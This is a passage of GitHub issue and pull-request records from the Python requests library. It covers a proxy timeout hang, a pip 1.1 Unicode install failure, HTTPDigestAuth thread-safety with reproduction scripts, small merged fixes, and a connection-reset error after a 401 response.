ther.\n\n```\nrequests.get(\"http://baidu.com\",timeout=0.1,proxies={'http':'http://120.0.0.1:80'})\n```\n", "@Petelin The code in both cases is identical: there is no difference. Please note, the timeout is _per socket event_: it is possible that you are hanging elsewhere in the stack.\n", "@Lukasa my bad \n\n```\nrequests.get(\"https://baidu.com\",timeout=0.1,proxies={'https':'http://120.0.0.1:80'})\n```\n\nuse a fake https proxie to access real https://baidu.com,it will just hang there.\n\ni do this in ipython with no context.\n", "I don't see the same behaviour: I see an instant timeout. It'd be good to know where you're blocking: what system are you running on?\n", "it's Ubuntu 14.04.2 LTS , 3.13.0-32-generic , all two version python not work.\n\n```\n╰─$ ipython\nPython 3.4.3 (default, Oct 14 2015, 20:28:29)\nType \"copyright\", \"credits\" or \"license\" for more information.\n\nIPython 4.1.1 -- An enhanced Interactive Python.\n? -> Introduction and overview of IPython's features.\n%quickref -> Quick reference.\nhelp -> Python's own help system.\nobject? -> Details about 'object', use 'object??' for extra details.\n\nIn [1]: import requests;requests.get(\"https://baidu.com\",timeout=0.1,proxies={'https':'http://120.0.0.1:80'})\n\n\n```\n\n```\n╰─$ python2.7 1 ↵\nPython 2.7.6 (default, Jun 22 2015, 17:58:13)\n[GCC 4.8.2] on linux2\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests;requests.get(\"https://baidu.com\",timeout=0.1,proxies={'https':'http://120.0.0.1:80'})\n\n\n```\n\nbut on my mac ipython5 python3 it works too.\n" ]
https://api.github.com/repos/psf/requests/issues/2335
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2335/labels{/name}
https://api.github.com/repos/psf/requests/issues/2335/comments
https://api.github.com/repos/psf/requests/issues/2335/events
https://github.com/psf/requests/issues/2335
48,597,173
MDU6SXNzdWU0ODU5NzE3Mw==
2,335
Cannot install anything depending on requests using pip 1.1 / Python 3.2
{ "avatar_url": "https://avatars.githubusercontent.com/u/140276?v=4", "events_url": "https://api.github.com/users/koterpillar/events{/privacy}", "followers_url": "https://api.github.com/users/koterpillar/followers", "following_url": "https://api.github.com/users/koterpillar/following{/other_user}", "gists_url": "https://api.github.com/users/koterpillar/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/koterpillar", "id": 140276, "login": "koterpillar", "node_id": "MDQ6VXNlcjE0MDI3Ng==", "organizations_url": "https://api.github.com/users/koterpillar/orgs", "received_events_url": "https://api.github.com/users/koterpillar/received_events", "repos_url": "https://api.github.com/users/koterpillar/repos", "site_admin": false, "starred_url": "https://api.github.com/users/koterpillar/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/koterpillar/subscriptions", "type": "User", "url": "https://api.github.com/users/koterpillar", "user_view_type": "public" }
[]
closed
true
null
[]
null
4
2014-11-13T04:34:34Z
2021-09-08T23:07:00Z
2014-11-13T14:42:22Z
NONE
resolved
Using stock Debian Wheezy configuration of Python 3.2 and pip 1.1, I can't install anything dependant on `requests`. For example, on a clean install: ``` # pip-3.2 install docker-py ... Downloading/unpacking requests>=2.2.1 (from docker-py>=0.4.0->docker-forklift) Downloading requests-2.4.3.tar.gz (438Kb): 438Kb downloaded Running setup.py egg_info for package requests Exception: Traceback (most recent call last): File "/usr/lib/python3/dist-packages/pip/basecommand.py", line 104, in main status = self.run(options, args) File "/usr/lib/python3/dist-packages/pip/commands/install.py", line 245, in run requirement_set.prepare_files(finder, force_root_egg_info=self.bundle, bundle=self.bundle) File "/usr/lib/python3/dist-packages/pip/req.py", line 1014, in prepare_files req_to_install.assert_source_matches_version() File "/usr/lib/python3/dist-packages/pip/req.py", line 359, in assert_source_matches_version version = self.installed_version File "/usr/lib/python3/dist-packages/pip/req.py", line 351, in installed_version return self.pkg_info()['version'] File "/usr/lib/python3/dist-packages/pip/req.py", line 318, in pkg_info data = self.egg_info_data('PKG-INFO') File "/usr/lib/python3/dist-packages/pip/req.py", line 261, in egg_info_data data = fp.read() File "/usr/lib/python3.2/encodings/ascii.py", line 26, in decode return codecs.ascii_decode(input, self.errors)[0] UnicodeDecodeError: 'ascii' codec can't decode byte 0xe2 in position 6265: ordinal not in range(128) ``` The offending line is in `HISTORY.rst`: "Refactored settings loading from environment — new Session.merge_environment_settings."
{ "avatar_url": "https://avatars.githubusercontent.com/u/1382556?v=4", "events_url": "https://api.github.com/users/Lukasa/events{/privacy}", "followers_url": "https://api.github.com/users/Lukasa/followers", "following_url": "https://api.github.com/users/Lukasa/following{/other_user}", "gists_url": "https://api.github.com/users/Lukasa/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/Lukasa", "id": 1382556, "login": "Lukasa", "node_id": "MDQ6VXNlcjEzODI1NTY=", "organizations_url": "https://api.github.com/users/Lukasa/orgs", "received_events_url": "https://api.github.com/users/Lukasa/received_events", "repos_url": "https://api.github.com/users/Lukasa/repos", "site_admin": false, "starred_url": "https://api.github.com/users/Lukasa/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/Lukasa/subscriptions", "type": "User", "url": "https://api.github.com/users/Lukasa", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2335/reactions" }
https://api.github.com/repos/psf/requests/issues/2335/timeline
null
completed
null
null
false
[ "Requests does not support Python 3.2, so I'm not really surprised by this.\n\nThat said, we can easily remove _this particular problem_. That makes no guarantees that requests works on Python 3.2, however, it's not part of our CI system and we don't test on the platform.\n", "We do not support Python 3.2 but in some of my projects, I do. In those projects I use requests and it installs fine with pip 1.5.6. The issue here is pip 1.1, which is horribly insecure to begin with because it does not verify any HTTPS connections it creates. pip 1.1 must be old enough to not know how to properly handle unicode values in text files. This isn't a bug in requests as far as I am concerned.\n", "Fair enough, I'm happy to go with that. Not a requests bug.\n", "If we look at pip install requests 2.4.3 on Python 3.2 on ubuntu on Travis-CI, it's clear that this is probably either a locale issue on the user's machine or a pip 1.1 issue. Besides, I have no desire to encourage usage of a wholly insecure tool by fixing something that would allow its usage.\n" ]
https://api.github.com/repos/psf/requests/issues/2334
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2334/labels{/name}
https://api.github.com/repos/psf/requests/issues/2334/comments
https://api.github.com/repos/psf/requests/issues/2334/events
https://github.com/psf/requests/issues/2334
48,540,996
MDU6SXNzdWU0ODU0MDk5Ng==
2,334
HTTPDigestAuth on session not thread-safe
{ "avatar_url": "https://avatars.githubusercontent.com/u/9700216?v=4", "events_url": "https://api.github.com/users/achorrath/events{/privacy}", "followers_url": "https://api.github.com/users/achorrath/followers", "following_url": "https://api.github.com/users/achorrath/following{/other_user}", "gists_url": "https://api.github.com/users/achorrath/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/achorrath", "id": 9700216, "login": "achorrath", "node_id": "MDQ6VXNlcjk3MDAyMTY=", "organizations_url": "https://api.github.com/users/achorrath/orgs", "received_events_url": "https://api.github.com/users/achorrath/received_events", "repos_url": "https://api.github.com/users/achorrath/repos", "site_admin": false, "starred_url": "https://api.github.com/users/achorrath/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/achorrath/subscriptions", "type": "User", "url": "https://api.github.com/users/achorrath", "user_view_type": "public" }
[]
closed
true
null
[]
null
12
2014-11-12T17:56:21Z
2021-09-08T18:00:53Z
2016-04-16T04:15:15Z
NONE
resolved
HTTPDigestAuth is not thread-safe when used on a session object. This script demonstrates the problem: ``` python import Queue import sys import threading import requests s = requests.Session() s.auth = requests.auth.HTTPDigestAuth('user', 'passwd') def tprint(astr): t = threading.current_thread().name sys.stdout.write('%s: %s\n' % (t, astr)) def worker(): resp = s.get('http://httpbin.org/digest-auth/auth/user/passwd') tprint(resp.status_code) t1 = threading.Thread(target=worker) t1.start() t2 = threading.Thread(target=worker) t2.start() t1.join() t2.join() ``` With debugging tprint()s added to auth.HTTPDigestAuth.handle_401(), the script generates output like this: ``` $ python threads_digest_1.py Thread-1: handle_401: num_401_calls: 1 Thread-1: handle_401: s_auth: Digest qop=auth, nonce="929169e53bab111e1c06e7a5207fe63b", realm="[email protected]", opaque="3e5078f698656ced77637bf72881e06b" Thread-2: handle_401: num_401_calls: 2 Thread-2: handle_401: s_auth: Digest qop=auth, nonce="f9bf0aa7be1fb59e85cbe0000f67a56a", realm="[email protected]", opaque="b0d6dee4bc0030c5bdefc2c76342479d" Thread-2: 401 Thread-1: 200 $ ```
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2334/reactions" }
https://api.github.com/repos/psf/requests/issues/2334/timeline
null
completed
null
null
false
[ "Session's aren't threadsafe so I'm not sure I understand why this is suprising.\n", "This is surprising because \"thread-safe\" is listed as one of the features of Requests, and there is nothing in the documentation to indicate that parts of it are not thread-safe.\n", "+1 with achorrath, I faced this issue and it's been quite hard to tackle down. Either clearly state that requests is not thread-safe from the documentation or provide a thread-safe session object.\n\nThanks.\n", "So the session isn't the problem here it's the digest instance. There's no good way for the digest auth instance to be thread safe when it doesn't have the same context that a session would have.\n", "Hi,\n\nBefore anything, here's a thanks for a great project to the authors and contributors. :)\n\nChiming in to share my experience which I believe is directly related to this case.\n- I faced what I believe to be the same underlying issue while working with multi-threaded NTLM authentication.\n- Seeing that the NTLM authenticator was not reusing connections correctly, I raised PR https://github.com/requests/requests-ntlm/pull/57 against requests-ntlm.\n- While testing harder and digging deeper I found out that my PR improved things, but was not enough to ensure correct multi-threaded NTLM authentication behaviour.\n- Given that NTLM does authentication on a per-connection basis, just like Digest auth, I suspected I would see the same types of failures with a simple multi-threaded Digest auth client.\n- I created one and reproduced the issue.\n- I came here looking for information: that's when I found this issue.\n\nMy suspicion about the underlying cause:\n- In `handle_401`, the Digest authenticator does a `r.connection.send(...)` to \"re-send\" the original request with the computed digest header in-place.\n- `r.connection.send` is, in fact, `HTTPAdapter.send` (in the example above, could be something else with a different adapter).\n- `HTTPAdapter.send` does a `conn = self.get_connection(...)`.\n- This ends up calling `PoolManager.connection_from_url(...)`.\n- This is the culprit: the PoolManager has no way of knowing how to return the correct connection given the fact that its argument is just the url.\n\nMy suspicion about a possible fix:\n(note: I'm not very familiar with the existing codebase. I may be making some mistakes and I'll gladly have them pointed out by someone.)\n- If my reasoning above is correct, the only way to ensure correct multi-threaded per-connection authentication at the requests API level is to somehow allow `handle_401` to \"re-send\" the request over the same connection.\n- This may require a different API given I don't think `HTTPAdapter.send`'s arguments may not comprise enough information so as to ensure the same connection is used.\n- Is this currently possible in any way? I don't think so (again, I'm not very familiar wth urllib3 API and innards). Thus an eventual fix may need to adapt / improve (while keeping backwards compatilibity, of course) the requests/urllib3 API and eventually, urllib3 internal APIs.\n\nAgain thanks in advance for any helpful input.\n", "So, we can do this if we _really_ want to by pulling the raw `httplib` connection object out and using it. That feels really nasty.\n", "Update, correcting myself:\n- Went reading RFC2617.\n- Figured out that my understanding about Digest auth was wrong: Digest auth does not authenticate connections (contrarily to NTLM), it does authenticate requests.\n- Given this, please disregard my considerations above concerning HTTPAdapters, Pools, etc.\n- Digged deeper into this particular case:\n - The culprit seems to be the fact that `HTTPDigestAuth.handle_401` only produces the `Authorization` header if it has been called less than 2 times (see ...`and num_401_calls < 2:` around line 172 in auth.py)\n - With two near-simultaneous threads, the first one entering `handle_401` will correctly produce the necessary auth headers, the second one will not.\n- My hack test:\n - Commented out the `and num_401_calls < 2` in auth.py.\n - Ran a variation of the test above successfully with 2, 20 and 200 threads (with the original code, I would only get 50% of the requests authenticated).\n- Possible fix:\n - The underlying `and num_401_calls < 2` seems to stem from #547 which, rightfully so, tries to prevent infinite auth failure loops. This means throwing the 401 call count away would lead to regressions.\n - A primitive approach would count 401 calls on a per-thread basis: not sure if feasible, not sure if elegant.\n\nHere are my 2c.\n\nPS: @Lukasa, given this, your comment about the (agreed, really nasty) possibility of pulling the raw `httplib` connection object would not apply here, but maybe feasible (at least for quick-hack tests) in https://github.com/requests/requests-ntlm. However, I'm not sure how to grab that object: any pointer? (lest's move this discussion away from this issue, shall we?) :)\n\nMore PS: For completeness, I dump my test code (easier to raise up thread count)\n\n``` python\n#!/usr/bin/env python\n# ------------------------------------------------------------------------------\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\n# ------------------------------------------------------------------------------\n\nimport logging\nimport threading\n\nimport requests\n\n\nclass ClientThread(threading.Thread):\n\n def __init__(self, session, url, *args, **kwargs):\n threading.Thread.__init__(self, *args, **kwargs)\n self.log = logging.getLogger('client.%s' % self.name)\n self.session = session\n self.url = url\n self.success = None\n\n def run(self, *args, **kwargs):\n self.response = self.session.get(self.url)\n self.log.info('self.response.status_code=%r' % self.response.status_code)\n self.log.debug('self.response.text=%r', self.response.text)\n self.success = self.response.status_code == requests.codes.ok\n\n\nif __name__ == '__main__':\n\n LOG_LEVEL = logging.INFO\n\n N_THREADS = 2\n\n URL = 'http://httpbin.org/digest-auth/auth/user/pass'\n AUTH_USERNAME = 'user'\n AUTH_PASSWORD = 'pass'\n\n logging.basicConfig(level=LOG_LEVEL)\n\n session = requests.session()\n session.auth = requests.auth.HTTPDigestAuth(AUTH_USERNAME, AUTH_PASSWORD)\n\n threads = [ClientThread(session, URL) for t in range(N_THREADS)]\n for t in threads:\n t.start()\n for t in threads:\n t.join()\n n_success = len([t.success for t in threads if t.success])\n\n log = logging.getLogger('client')\n log_level = logging.WARN if n_success!=N_THREADS else logging.INFO\n log.log(log_level, 'success rate %i/%i', n_success, N_THREADS)\n```\n", "Update:\n- I submited PR #2523 with a possible solution based on a per-thread num_401_calls count.\n- @achorrath , @vincentxb : Can you give it a run and confirm correct multi-threaded operation?\n", "Greetings all. Thanks for taking care of this @exvito. My only concern is about nonce and nonce_count values in a multi-threaded context. More generally, how do you deal with two threads being simultaneously in the handle_401() method?\n", "@vincentxb : thanks for your feedback. You are correct. @tardyp made the same comment in #2523. I'll go ahead and extend the per-thread storage to the other state attributes.\n", "Anything holding back these patches? 'm using a local patchset for requests_ntlm in production to work around the connection recycle problem (see https://github.com/requests/requests-ntlm/pull/51) but I would prefer to use the official repo.\n", "This has been fixed for almost a year now.\n" ]
https://api.github.com/repos/psf/requests/issues/2333
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2333/labels{/name}
https://api.github.com/repos/psf/requests/issues/2333/comments
https://api.github.com/repos/psf/requests/issues/2333/events
https://github.com/psf/requests/pull/2333
48,523,557
MDExOlB1bGxSZXF1ZXN0MjQzMDA1MDk=
2,333
Fix HTTPDigestAuth not to treat non-file as a file
{ "avatar_url": "https://avatars.githubusercontent.com/u/53781?v=4", "events_url": "https://api.github.com/users/akitada/events{/privacy}", "followers_url": "https://api.github.com/users/akitada/followers", "following_url": "https://api.github.com/users/akitada/following{/other_user}", "gists_url": "https://api.github.com/users/akitada/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/akitada", "id": 53781, "login": "akitada", "node_id": "MDQ6VXNlcjUzNzgx", "organizations_url": "https://api.github.com/users/akitada/orgs", "received_events_url": "https://api.github.com/users/akitada/received_events", "repos_url": "https://api.github.com/users/akitada/repos", "site_admin": false, "starred_url": "https://api.github.com/users/akitada/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/akitada/subscriptions", "type": "User", "url": "https://api.github.com/users/akitada", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-12T15:35:12Z
2021-09-08T09:01:17Z
2014-11-12T15:53:32Z
CONTRIBUTOR
resolved
Ensure pos is set to None when the body is not a file so that HTTPDigestAuth detects the type of the body correctly.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2333/reactions" }
https://api.github.com/repos/psf/requests/issues/2333/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2333.diff", "html_url": "https://github.com/psf/requests/pull/2333", "merged_at": "2014-11-12T15:53:32Z", "patch_url": "https://github.com/psf/requests/pull/2333.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2333" }
true
[ ":sparkles: :cake: :sparkles: Thanks @akitada !!!\n" ]
https://api.github.com/repos/psf/requests/issues/2332
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2332/labels{/name}
https://api.github.com/repos/psf/requests/issues/2332/comments
https://api.github.com/repos/psf/requests/issues/2332/events
https://github.com/psf/requests/pull/2332
48,518,978
MDExOlB1bGxSZXF1ZXN0MjQyOTc2MTg=
2,332
Add overriding Content-Length
{ "avatar_url": "https://avatars.githubusercontent.com/u/2456311?v=4", "events_url": "https://api.github.com/users/asnelzin/events{/privacy}", "followers_url": "https://api.github.com/users/asnelzin/followers", "following_url": "https://api.github.com/users/asnelzin/following{/other_user}", "gists_url": "https://api.github.com/users/asnelzin/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/asnelzin", "id": 2456311, "login": "asnelzin", "node_id": "MDQ6VXNlcjI0NTYzMTE=", "organizations_url": "https://api.github.com/users/asnelzin/orgs", "received_events_url": "https://api.github.com/users/asnelzin/received_events", "repos_url": "https://api.github.com/users/asnelzin/repos", "site_admin": false, "starred_url": "https://api.github.com/users/asnelzin/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/asnelzin/subscriptions", "type": "User", "url": "https://api.github.com/users/asnelzin", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-12T14:58:25Z
2021-09-08T09:01:17Z
2014-11-12T17:34:48Z
CONTRIBUTOR
resolved
This is related to https://github.com/kennethreitz/requests/issues/2329 Just implemented @Lukasa's solution and added test.
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2332/reactions" }
https://api.github.com/repos/psf/requests/issues/2332/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2332.diff", "html_url": "https://github.com/psf/requests/pull/2332", "merged_at": "2014-11-12T17:34:48Z", "patch_url": "https://github.com/psf/requests/pull/2332.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2332" }
true
[ "LGTM. I'm happy to take this. :cake: Thanks!\n" ]
https://api.github.com/repos/psf/requests/issues/2331
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2331/labels{/name}
https://api.github.com/repos/psf/requests/issues/2331/comments
https://api.github.com/repos/psf/requests/issues/2331/events
https://github.com/psf/requests/issues/2331
48,497,928
MDU6SXNzdWU0ODQ5NzkyOA==
2,331
401 does not prevent ConnectionError: [Errno 104] Connection reset by peer
{ "avatar_url": "https://avatars.githubusercontent.com/u/6807917?v=4", "events_url": "https://api.github.com/users/suonto/events{/privacy}", "followers_url": "https://api.github.com/users/suonto/followers", "following_url": "https://api.github.com/users/suonto/following{/other_user}", "gists_url": "https://api.github.com/users/suonto/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/suonto", "id": 6807917, "login": "suonto", "node_id": "MDQ6VXNlcjY4MDc5MTc=", "organizations_url": "https://api.github.com/users/suonto/orgs", "received_events_url": "https://api.github.com/users/suonto/received_events", "repos_url": "https://api.github.com/users/suonto/repos", "site_admin": false, "starred_url": "https://api.github.com/users/suonto/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/suonto/subscriptions", "type": "User", "url": "https://api.github.com/users/suonto", "user_view_type": "public" }
[]
closed
true
null
[]
null
2
2014-11-12T11:02:05Z
2021-09-08T23:07:02Z
2014-11-12T14:35:41Z
NONE
resolved
The following code behaviour is not logical in a specific case: response = requests.post(url, data=yielding_function()) If the server sends error in prepare, for example 401 before processing data, then in the client requests will raise: ConnectionError [Errno 104] Connection reset by peer In my opinion, the proper behaviour would be to not raise the exception, and return 401 and the body in the standard way. Of course only in the case that 401 is received before data is rejected. I further tested this by adding 1 second delay before yielding any data, and even if the 401 comes back from the server before any data is sent, requests will still ignore it, send the data, and then raise ConnectionError: [Errno 104] Connection reset by peer because the data get's rejected.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2331/reactions" }
https://api.github.com/repos/psf/requests/issues/2331/timeline
null
completed
null
null
false
[ "Thanks for raising this!\n\nUnfortunately, this bug lives a long way down the stack, in `httplib`. Specifically, `httplib` never checks the socket to see if there is any data to read before sending the body.\n\nWhat you've actually stumbled upon, however, is one of the trickiest parts of HTTP/1.1: how do we know we have a response to read? It's not enough to poll for data after we send the headers, because the response might be in flight and we could miss it. So we'd have to poll after each data send. That's not enough either: it's possible that we could send some data, causing the server to emit the response and RST packet that reaches us _after_ we poll (so not marking the socket readable) but _before_ we send again, therefore still causing the `Connection reset by peer` error. This gets more likely in the event of threading etc. causing us to have to wait.\n\nHandling all of this properly is extremely tricky and `httplib` just doesn't do it, so while we're using `httplib` we cannot get around it. One day I'd like to replace `httplib`, but until that happens we're between a rock and a hard place.\n\nAn interesting idea is whether we can take the socket with us when we throw these exceptions, so that the user can read from them if they want to. However, that breaks our connection re-use where we attempt to re-use socket objects: we can't do that if the user has a handle to them.\n\nI'm tempted to call this a \"can't fix\". @sigmavirus24?\n", "Not only \"can't\" but \"won't\" as well.\n" ]